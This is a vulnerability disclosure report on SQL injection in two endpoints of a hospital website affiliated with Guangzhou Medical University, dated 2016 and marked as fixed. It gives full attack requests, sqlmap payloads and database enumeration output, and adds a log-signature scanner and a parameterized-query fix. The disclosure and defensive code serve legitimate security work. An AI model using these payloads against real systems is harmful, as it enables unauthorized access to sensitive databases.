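2016-05-23: Details reported to the vendor; awaiting vendor handling
2016-05-24: Vendor confirmed; details disclosed to the vendor only
2016-05-24: Vendor fixed the vulnerability and disclosed it voluntarily; details released to the public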
SQL injection vulnerability at an affiliated hospital of Guangzhou Medical University (17 databases)
1. Parameters: tst&txtSCode
http://www.gy3y.com:80/API/TipHandler.ashx (POST) fn=getresult&txtEmail=sample@email.tst&txtSCode=-1*
POST /API/TipHandler.ashx HTTP/1.1
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.gy3y.com/
Cookie: ASP.NET_SessionId=t4kpl01delq4mjcq3qsdki1r; v="2016052210011700077312700181007386|::"; opxPID=2016052210011700077312700181007386; u=1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|; JSESSIONID=9E1564ED74AE9583CEBA0E891D5E9E62
Host: www.gy3y.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

fn=getresult&txtEmail=sample%40email.tst&txtSCode=-1'%20OR%203*2*1%3d6%20AND%20000739%3d000739%20or%20'bjQoX1tH'%3d'
Verification:
sqlmap identified the following injection point(s) with a total of 207 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
--current-user
current user: 'gy3y_new'
--current-db
current database: 'gy3y'
--dbs
available databases [17]:
[*] by_gtmi
[*] by_gy3y_dnk
[*] by_gy3y_nkjy
[*] by_gy3y_partyschool
[*] exam_F
[*] exam_gys
[*] gdlisxp
[*] gy3y
[*] gy3y_gdklmod
[*] gy3y_young
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] ScienResearch
[*] tempdb
--columns
2. Parameter: CardID
POST /api/post.aspx?callback=parent.SaveCallback&fn=jobResume HTTP/1.1
Content-Length: 907
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.gy3y.com/
Cookie: ASP.NET_SessionId=t4kpl01delq4mjcq3qsdki1r; v="2016052210011700077312700181007386|::"; opxPID=2016052210011700077312700181007386; u=1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|; JSESSIONID=9E1564ED74AE9583CEBA0E891D5E9E62
Host: www.gy3y.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

BirthdayDay=1&BirthdayYear=01/01/1967&CardID=lI1a0BjE';%20waitfor%20delay%20'0:0:0'%20--%20&child=%e5%ad%90&City=&ComputerLevel=Acunetix&Edu=1&EduLength=1&Edulevel=1&Edus=1&EduSpecialtys=1&EduStartEndDates=01/01/1967&Email=sample%40email.tst&FamilyName=nmiirptj&FamilyPosition=1&FamilyRelation=%e7%88%b6&FamilyUnit=1&Fertility=%e6%9c%aa%e8%82%b2&ForeignLanguageLevel=english&Height=1&JobID=103566&JoinPartyDate=01/01/1967&LearnForm=%e5%85%a8%e6%97%a5%e5%88%b6&MaritalStateid=%e6%9c%aa%e5%a9%9a&Name=nmiirptj&Nation=1&Other=1&Partisan=1&Photo=&PoliticalStateid=%e6%97%a0&Province=&rdoCouple=%e5%a4%ab&RecruitmentWay=1&RegisteredAddress=3137%20Laguna%20Street&Research=&School=1&Schools=1&Sex=%e7%94%b7&siblings1=&siblings2=&siblings3=&Specialty=1&TechnicalQualifications=1&Tel=555-666-0606&TemplateFilePath=&Training=1&txtfile=&WorkJobs=1&WorkReason=1&WorkRelatives=1&WorkStartEndDates=01/01/1967&WorkUnits=1
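The probes in both requests and in the sqlmap output fall into a few recognisable shapes, which makes them easy to find when reviewing web or WAF logs. The following is an added example, not part of the original report: the signature names are made up here, and the sample bodies are constructed (shortened) from the payloads shown above.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Signatures for the payload shapes seen in this report (SQL Server syntax).
SIGNATURES = {
    # A closing quote followed by OR/AND and a comparison: -1' OR 3*2*1=6
    "quote-then-boolean": re.compile(r"'\s*(?:OR|AND)\s+[\w'*]+\s*=", re.I),
    # Error-based extraction: CONVERT(INT,(SELECT CHAR(113)+...
    "error-based-convert": re.compile(
        r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\s+CHAR\s*\(", re.I),
    # "Heavy query" delay: COUNT(*) over sysusers joined with itself
    "heavy-query-delay": re.compile(
        r"COUNT\s*\(\s*\*\s*\)\s+FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers", re.I),
    # Timing probe via WAITFOR DELAY
    "waitfor-delay": re.compile(r"\bWAITFOR\s+DELAY\s+'", re.I),
}


def scan_form_body(body):
    """Return {parameter: [signature names]} for a urlencoded POST body."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


def sample_bodies():
    """Constructed request bodies, encoded the way a client would send them."""
    base = {"fn": "getresult", "txtEmail": "sample@email.tst"}
    return {
        "benign": urlencode({**base, "txtSCode": "A1B2C3"}),
        "boolean-probe": urlencode({
            **base,
            "txtSCode": "-1' OR 3*2*1=6 AND 000739=000739 or 'bjQoX1tH'='"}),
        "error-based": urlencode({
            **base,
            "txtSCode": "-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)))-- vVSP"}),
        "heavy-query": urlencode({
            **base,
            "txtSCode": "-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,"
                        "sysusers AS sys2)-- QFft"}),
        "waitfor": urlencode({
            "CardID": "lI1a0BjE'; waitfor delay '0:0:0' -- ",
            "Name": "nmiirptj"}),
    }


if __name__ == "__main__":
    for label, body in sample_bodies().items():
        print(label, scan_form_body(body))
```

Matching of this kind is for log review and alerting; it does not replace fixing the queries behind the two endpoints.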
Fix the injection vulnerability.
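One way to make that fix, shown as an added example rather than the site's actual code. The handler's query is not on the page, so the table and column names (TipOff, Email, SecurityCode, ReplyTxt), the code format and the function names are assumptions, and Python's sqlite3 stands in for ASP.NET and SQL Server; the probe value is the one from the first request.

```python
import re
import sqlite3

# Probe value from the first request in this report (URL-decoded).
PROBE = "-1' OR 3*2*1=6 AND 000739=000739 or 'bjQoX1tH'='"

# Assumed format of a legitimate security code (hypothetical).
SCODE_RE = re.compile(r"[A-Za-z0-9]{1,32}")


def make_db():
    """In-memory database with constructed sample rows (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE TipOff (ID INTEGER PRIMARY KEY, Email TEXT, "
               "SecurityCode TEXT, ReplyTxt TEXT)")
    db.executemany(
        "INSERT INTO TipOff (Email, SecurityCode, ReplyTxt) VALUES (?, ?, ?)",
        [("alice@example.test", "K7Q2M9", "reply for alice"),
         ("bob@example.test", "Z4T8R1", "reply for bob")])
    return db


def get_result_vulnerable(db, email, scode):
    # Before: input is pasted into the SQL text, so a quote in scode ends the
    # string literal and the remainder is parsed as SQL.
    sql = ("SELECT ReplyTxt FROM TipOff WHERE Email = '" + email +
           "' AND SecurityCode = '" + scode + "' ORDER BY ID")
    return [row[0] for row in db.execute(sql)]


def get_result_parameterized(db, email, scode):
    # After: both values are bound as parameters and are only ever compared
    # as data, whatever characters they contain.
    sql = ("SELECT ReplyTxt FROM TipOff "
           "WHERE Email = ? AND SecurityCode = ? ORDER BY ID")
    return [row[0] for row in db.execute(sql, (email, scode))]


def handle_getresult(db, form):
    """Hardened handler: validate, bind, and never echo database errors."""
    email = form.get("txtEmail", "")
    scode = form.get("txtSCode", "")
    if not SCODE_RE.fullmatch(scode):
        return {"ok": False, "error": "invalid request"}
    try:
        replies = get_result_parameterized(db, email, scode)
    except sqlite3.Error:
        # Error-based extraction depends on database errors reaching the
        # response; details belong in the server log only.
        return {"ok": False, "error": "server error"}
    return {"ok": True, "replies": replies}


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", get_result_vulnerable(db, "sample@email.tst", PROBE))
    print("parameterized:", get_result_parameterized(db, "sample@email.tst", PROBE))
    print("handler:", handle_getresult(
        db, {"txtEmail": "sample@email.tst", "txtSCode": PROBE}))
```

In the ASP.NET handler itself the equivalent is a SqlCommand with SqlParameter values instead of string concatenation, applied to every field of both endpoints.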
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-05-24 08:06
Thanks!
2016-05-24: The developer has fixed it.